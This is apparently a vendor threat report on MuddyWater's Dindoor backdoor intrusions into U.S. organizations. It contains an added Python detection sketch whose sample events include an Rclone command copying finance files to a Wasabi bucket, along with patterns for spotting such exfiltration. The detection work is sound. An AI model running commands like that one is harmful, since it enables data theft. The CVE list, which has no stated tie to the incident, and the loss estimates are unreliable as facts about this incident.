Executive Summary
In early February 2026, the Iranian state-sponsored hacking group MuddyWater (also known as Seedworm) infiltrated networks of multiple U.S. organizations, including a bank, an airport, and a software company with Israeli operations. The attackers deployed a previously unknown backdoor named Dindoor, which utilizes the Deno JavaScript runtime for execution. Additionally, they attempted data exfiltration using the Rclone utility to a Wasabi cloud storage bucket. The initial access methods remain unclear, but MuddyWater is known for using phishing emails and exploiting vulnerabilities in public-facing applications. (thehackernews.com)
This incident underscores the evolving capabilities of Iranian threat actors, who have demonstrated improved tooling and social engineering tactics. The timing of these intrusions, coinciding with escalating geopolitical tensions following U.S. and Israeli military actions, highlights the potential for cyber operations to serve as instruments of state power during periods of conflict. (thehackernews.com)
Why This Matters Now
The presence of MuddyWater within critical U.S. networks poses an immediate threat, especially amid rising geopolitical tensions. Organizations must enhance their cybersecurity measures to prevent potential data breaches and operational disruptions.
Attack Path Analysis
MuddyWater initiated the attack by exploiting vulnerabilities in public-facing applications to gain initial access. They escalated privileges by deploying the Dindoor backdoor, allowing deeper system control. The attackers moved laterally within the network, deploying additional malware like Fakeset to expand their foothold. They established command and control channels using the Dindoor backdoor to communicate with external servers. Data exfiltration was attempted using the Rclone utility to transfer data to external cloud storage. The impact of the attack included potential data breaches and system compromise, though the full extent remains unclear.
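The two tradecraft signals in the attack path above, Rclone pushing data to Wasabi object storage and a backdoor hosted on the Deno runtime, can be checked for in endpoint telemetry. The following is an added detection sketch, not code from the original report or from any vendor; it assumes process-creation events carry an image path and command line, DNS events carry the queried name, and that Wasabi's S3 API is reached under wasabisys.com.

```python
"""Score process-creation and DNS events for two signals named in the attack path above:
Rclone transfers toward Wasabi object storage, and a Deno runtime started with broad
permissions on a script from a staging path or remote URL. Events are constructed samples."""
import re

WASABI_HOST = re.compile(r"(^|\.)wasabisys\.com$", re.I)  # Wasabi S3 API domain (assumed exfil target)
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
DENO_BROAD = {"-A", "--allow-all", "--allow-net", "--allow-run"}
# Paths are normalised to backslashes before matching, so POSIX staging dirs are listed that way too.
STAGING_DIRS = ("\\temp\\", "\\users\\public\\", "\\programdata\\", "\\tmp\\", "\\dev\\shm\\")

def classify(event):
    """Return alert names for one event; an empty list means nothing matched."""
    alerts = []
    if event["type"] == "dns":
        if WASABI_HOST.search(event["query"]):
            alerts.append("dns:wasabi_endpoint")
        return alerts
    exe = event["image"].lower().replace("/", "\\").rsplit("\\", 1)[-1]
    argv = event["cmdline"].split()
    # Rclone with a transfer verb: staging for exfil whichever remote is configured.
    if exe in ("rclone.exe", "rclone") and RCLONE_VERBS.intersection(argv):
        alerts.append("proc:rclone_transfer")
    # An endpoint passed inline (e.g. --s3-endpoint) exposes the destination on the command line.
    if "wasabisys.com" in event["cmdline"].lower():
        alerts.append("proc:wasabi_endpoint")
    # Deno: broad permission flags plus a script from a staging dir or fetched by URL.
    if exe in ("deno.exe", "deno") and "run" in argv:
        rest = [a for a in argv[argv.index("run") + 1:] if not a.startswith("-")]
        script = rest[0].lower().replace("/", "\\") if rest else ""
        untrusted = script.startswith(("http:", "https:")) or any(d in script for d in STAGING_DIRS)
        if DENO_BROAD.intersection(argv) and untrusted:
            alerts.append("proc:deno_broad_perms_untrusted_script")
    return alerts

def scan(events):
    """Map event id -> alerts for every event that raised at least one."""
    results = {e["id"]: classify(e) for e in events}
    return {k: v for k, v in results.items() if v}

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"id": 2, "type": "process", "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone.exe copy C:\Share\Finance wasabi:ext-bucket --transfers 8"},
    {"id": 3, "type": "dns", "query": "s3.us-east-1.wasabisys.com"},
    {"id": 4, "type": "process", "image": r"C:\Users\jdoe\.deno\bin\deno.exe",
     "cmdline": r"deno.exe run -A C:\ProgramData\svc\main.js"},
    {"id": 5, "type": "process", "image": r"C:\Users\jdoe\.deno\bin\deno.exe",
     "cmdline": r"deno.exe run --allow-net C:\Users\jdoe\src\app\server.ts"},
]
```

Event 5 is deliberately a developer's ordinary Deno use and raises nothing; Deno installs under the user profile by default, so the image path alone is not a useful signal and the script origin is what is scored.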
Kill Chain Progression
Initial Compromise
Description
MuddyWater exploited vulnerabilities in public-facing applications to gain initial access to the target networks.
Related CVEs
CVE-2017-7921
CVSS 9.8
An improper authentication vulnerability in Hikvision devices allows remote attackers to escalate privileges and access sensitive information.
Affected Products:
Hikvision DS-2CD2xx2F-I Series – V5.2.0 build 140721 to V5.4.0 build 160530
Hikvision DS-2CD2xx0F-I Series – V5.2.0 build 140721 to V5.4.0 build 160401
Hikvision DS-2CD2xx2FWD Series – V5.3.1 build 150410 to V5.4.4 build 161125
Hikvision DS-2CD4x2xFWD Series – V5.2.0 build 140721 to V5.4.0 build 160414
Hikvision DS-2CD4xx5 Series – V5.2.0 build 140721 to V5.4.0 build 160421
Hikvision DS-2DFx Series – V5.2.0 build 140805 to V5.4.5 build 160928
Hikvision DS-2CD63xx Series – V5.0.9 build 140305 to V5.3.5 build 160106
Exploit Status: exploited in the wild
CVE-2023-6895
CVSS 9.8
An OS command injection vulnerability in Hikvision Intercom Broadcasting System allows remote attackers to execute arbitrary commands.
Affected Products:
Hikvision Intercom Broadcasting System – 3.0.3_20201113_RELEASE(HIK)
Exploit Status: proof of concept
CVE-2021-36260
CVSS 9.8
A command injection vulnerability in Hikvision web servers allows remote attackers to execute arbitrary commands.
Affected Products:
Hikvision – various Hikvision products, multiple versions
Exploit Status: exploited in the wild
CVE-2025-34067
CVSS 10
An unauthenticated remote command execution vulnerability in Hikvision Integrated Security Management Platform due to deserialization of untrusted data.
Affected Products:
Hikvision Integrated Security Management Platform – affected versions
Exploit Status: active scanning observed
CVE-2021-33044
CVSS 9.8
An authentication bypass vulnerability in Dahua products allows remote attackers to bypass device identity authentication.
Affected Products:
Dahua – various Dahua products, multiple versions
Exploit Status: exploited in the wild
MITRE ATT&CK® Techniques
Spearphishing Attachment
Command and Scripting Interpreter: PowerShell
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Subvert Trust Controls: Code Signing
System Information Discovery
Exfiltration Over C2 Channel
Ingress Tool Transfer
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure all system components and software are protected from known vulnerabilities by installing applicable vendor-supplied security patches.
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Identity and Access Management
Control ID: 3.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Banking/Mortgage
Iranian state-sponsored MuddyWater targeted U.S. banks with the Dindoor backdoor, taking advantage of permissive east-west traffic and egress controls to exfiltrate data over encrypted channels.
Airlines/Aviation
U.S. airports were compromised by MuddyWater using the Fakeset Python backdoor, reaching critical infrastructure through lateral movement and command-and-control activity against operational technology systems.
Computer Software/Engineering
Defense/aerospace software supplier's Israeli operations breached with attempted data exfiltration to cloud storage, highlighting supply chain risks and zero trust segmentation failures.
Defense/Space
Software suppliers to defense industry targeted by Iranian intelligence, demonstrating state-sponsored espionage threats requiring enhanced multicloud visibility and threat detection capabilities.
Sources
- Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoor: https://thehackernews.com/2026/03/iran-linked-muddywater-hackers-target.html
- Mori, Software S1047 | MITRE ATT&CK®: https://attack.mitre.org/software/S1047/
- CVE-2017-7921 Detail: https://nvd.nist.gov/vuln/detail/CVE-2017-7921
- CVE-2023-6895 Detail: https://nvd.nist.gov/vuln/detail/CVE-2023-6895
- CVE-2021-36260 Detail: https://nvd.nist.gov/vuln/detail/CVE-2021-36260
- CVE-2025-34067 Detail: https://nvd.nist.gov/vuln/detail/CVE-2025-34067
- CVE-2021-33044 Detail: https://nvd.nist.gov/vuln/detail/CVE-2021-33044
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have constrained MuddyWater's lateral movement and data exfiltration, thereby reducing the attack's blast radius.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The attacker's ability to exploit vulnerabilities in public-facing applications may have been limited, reducing the likelihood of initial access.
Control: Zero Trust Segmentation
Mitigation: The attacker's ability to escalate privileges and gain deeper system control could have been constrained, limiting their access scope.
Control: East-West Traffic Security
Mitigation: The attacker's lateral movement within the network could have been limited, reducing their ability to deploy additional malware.
Control: Multicloud Visibility & Control
Mitigation: The attacker's ability to establish command and control channels may have been constrained, limiting external communications.
Control: Egress Security & Policy Enforcement
Mitigation: The attacker's data exfiltration attempts could have been limited, reducing the risk of data breaches.
The overall impact of the attack could have been reduced, limiting data breaches and system compromise.
Impact at a Glance
Affected Business Functions
- Network Security
- Data Integrity
- Operational Continuity
Estimated downtime: 7 days
Estimated loss: $500,000
Potential exposure of sensitive corporate data and intellectual property.
Recommended Actions
Key Takeaways & Next Steps
- Implement Zero Trust Segmentation to restrict lateral movement and limit the spread of malware within the network.
- Deploy East-West Traffic Security measures to monitor and control internal traffic, detecting unauthorized communications.
- Utilize Egress Security & Policy Enforcement to prevent unauthorized data exfiltration to external destinations.
- Enhance Threat Detection & Anomaly Response capabilities to identify and respond to malicious activities promptly.
- Ensure comprehensive Multicloud Visibility & Control to maintain oversight across all cloud environments and detect anomalous interactions.